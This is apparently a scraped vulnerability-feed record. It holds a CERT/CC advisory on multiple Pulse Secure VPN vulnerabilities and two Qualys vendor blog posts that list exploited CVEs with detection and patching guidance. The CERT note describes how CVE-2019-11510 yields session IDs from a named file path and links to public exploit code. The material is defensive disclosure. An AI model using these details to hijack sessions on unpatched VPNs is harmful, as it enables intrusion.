\n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability. \n[CVE-2019-11509](<https://nvd.nist.gov/vuln/detail/CVE-2019-11509>) \\- Authenticated attacker via the admin web interface can exploit this issue to execute arbitrary code on the Pulse Secure appliance. \n[CVE-2019-11508 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>)\\- A vulnerability in the Network File Share (NFS) of Pulse Connect Secure allows an authenticated end-user attacker to upload a malicious file to write arbitrary files to the local system. \n[CVE-2019-11507](<https://nvd.nist.gov/vuln/detail/CVE-2019-11507>) \\- A XSS issue has been found in Pulse Secure Application Launcher page. Pulse Connect Secure (PCS) 8.3.x before 8.3R7.1, and 9.0.x before 9.0R3. \n[CVE-2019-11543](<https://nvd.nist.gov/vuln/detail/CVE-2019-11543>) \\- A XSS issue found the admin web console. Pulse Secure Pulse Connect Secure (PCS) 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, and 5.2RX before 5.2R12.1. \n[CVE-2019-11542](<https://nvd.nist.gov/vuln/detail/CVE-2019-11542>) \\- Authenticated attacker via the admin web interface can send a specially crafted message resulting in a stack buffer overflow. \n[CVE-2019-11541](<https://nvd.nist.gov/vuln/detail/CVE-2019-11541>) \\- Users using SAML authentication with Reuse Existing NC (Pulse) Session option may see authentication leaks \n[CVE-2019-11540](<https://nvd.nist.gov/vuln/detail/CVE-2019-11540>) \\- A vulnerability in the Pulse Secure could allow an unauthenticated, remote attacker to conduct a (end user) session hijacking attack. \n[CVE-2019-11539](<https://nvd.nist.gov/vuln/detail/CVE-2019-11539>) \\- Authenticated attacker via the admin web interface allow attacker to inject and execute command injection \n[CVE-2019-11538](<https://nvd.nist.gov/vuln/detail/CVE-2019-11538>) \\- A vulnerability in the Network File Share (NFS) of Pulse Connect Secure could allow an authenticated end-user attacker to access the contents of arbitrary files on the local file system. \n \nExploitation of these vulnerabilities was demonstrated at various events and proved to be highly impactful due to the direct access to admin privileges and the consequent ability to infect multiple VPN connected users and their desktops. Initially there was a lack of clarity about CVE-2019-11510, as to whether it can be mitigated with the requirement of a client-certificate or two-factor authentication (2FA) to prevent this attack. CERT/CC has confirmed with the vendor that this vulnerability cannot be mitigated using client certificate and furthermore there is no viable alternative to updating the Pulse Secure VPN software to a non-vulnerable version. Even if client certificates are required for user authentication, CVE-2019-11510 can be exploited by an unauthenticated remote attacker to obtain session IDs of active users stored in /data/runtime/mtmp/lmdb/randomVal/data.mdb. The attacker can use these session IDs to impersonate as one of the active users. If a Pulse Secure administrator is currently active and the administrative access is available to the attacker, attacker could gain administrative access to Pulse Secure VPN. It is highly recommended that all Pulse Secure VPN administrators perform the required upgrade on all their affected products. If your Pulse Secure VPN has been identified as End of Engineering (EOE) and End of Life (EOL), we highly recommend replacement of the VPN appliance entirely without any delay - please check Pulse Secure advisory for this information. \n \nTimelines of specific events: \nMarch 22, 2019 \u2013 Security researcher O. Tsai and M. Chang responsibly disclose vulnerability to Pulse Secure \nApril 24, 2019 - Initial advisory posted and software updates posted by Pulse Secure to the Download Center \nApril 25, 2019 \u2013 Assignment of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-11509](<https://nvd.nist.gov/vuln/detail/CVE-2019-11509>), [CVE-2019-11508](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>), [CVE-2019-11507](<https://nvd.nist.gov/vuln/detail/CVE-2019-11507>), [CVE-2019-11543](<https://nvd.nist.gov/vuln/detail/CVE-2019-11543>), [CVE-2019-11542](<https://nvd.nist.gov/vuln/detail/CVE-2019-11542>), [CVE-2019-11541](<https://nvd.nist.gov/vuln/detail/CVE-2019-11541>), [CVE-2019-11540](<https://nvd.nist.gov/vuln/detail/CVE-2019-11540>), [CVE-2019-11539](<https://nvd.nist.gov/vuln/detail/CVE-2019-11539>), [CVE-2019-11538](<https://nvd.nist.gov/vuln/detail/CVE-2019-11538>) \nApril 26, 2019 - Workaround provided for [CVE-2019-11508](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>) about disabling file sharing as a mitigation \nMay 28 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne \nJuly 31 2019 \u2013 Full RCE use of exploit demonstrated using the admin session hash to get complete shell \nAugust 8 2019 - Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation \nAugust 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade \nOctober 7, 2019 \u2013 NSA produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by Advanced Persistent Threat actors \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server. \n \n--- \n \n### Solution \n\nThere is **no** viable workaround except to apply the patch and updates provided by the vendor. It is incorrect to assume use of client certificates or two-factor authentication (2FA) can prevent [CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)RCE pre-auth vulnerability. Updates are available from [Pulse Secure Advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>). \n \n--- \n \n[CVE-2019-11508 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>)and [CVE-2019-11538](<https://nvd.nist.gov/vuln/detail/CVE-2019-11538>) can be mitigated by disabling File Sharing on the Pulse Secure VPN appliance. \n \nThere are **no **workarounds that address the other vulnerabilities. \n \n--- \n \n### Vendor Information\n\n927237\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Pulse Secure __ Affected\n\nNotified: October 09, 2019 Updated: October 16, 2019 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS).\n\n### Vendor Information \n\nVendor has provided a detailed advisory [here](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>). \n\nThere is no workaround to address CVE-2019-11510 vulnerability. Pulse Secure recommends software upgrade as soon as possible.\n\n### Vendor References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.4 | AV:N/AC:L/Au:N/C:C/I:C/A:N \nTemporal | 8.2 | E:H/RL:OF/RC:C \nEnvironmental | 8.2 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>\n * <https://cyber.gc.ca/en/alerts/active-exploitation-vpn-vulnerabilities>\n * <https://github.com/projectzeroindia/CVE-2019-11510>\n * <https://www.exploit-db.com/exploits/47297>\n * <https://www.youtube.com/watch?v=v7JUMb70ON4>\n * <https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>\n * <https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>\n\n### Acknowledgements\n\nThis vulnerability was reported by Pulse Secure, who in turn credit Orange Tsai and Meh Chang from DEVCORE research team, and Jake Valletta from FireEye\n\nThis document was written by Vijay S Sarvepalli.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-11510](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-11509](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11509>), [CVE-2019-11508](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11508>), [CVE-2019-11507](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11507>), [CVE-2019-11543](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11543>), [CVE-2019-11542](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11542>), [CVE-2019-11541](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11541>), [CVE-2019-11540](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11540>), [CVE-2019-11539](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11539>), [CVE-2019-11538](<http://web.nvd.nist.gov/vuln/detail/CVE-2019-11538>) \n---|--- \n**Date Public:** | 2019-04-28 \n**Date First Published:** | 2019-10-16 \n**Date Last Updated: ** | 2019-10-23 02:35 UTC \n**Document Revision: ** | 43 \n", "modified": "2019-10-23T02:35:00", "published": "2019-10-16T00:00:00", "id": "VU:927237", "href": "https://www.kb.cert.org/vuls/id/927237", "type": "cert", "title": "Pulse Secure VPN contains multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-01-06T00:22:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "modified": "2020-12-10T00:48:29", "published": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### 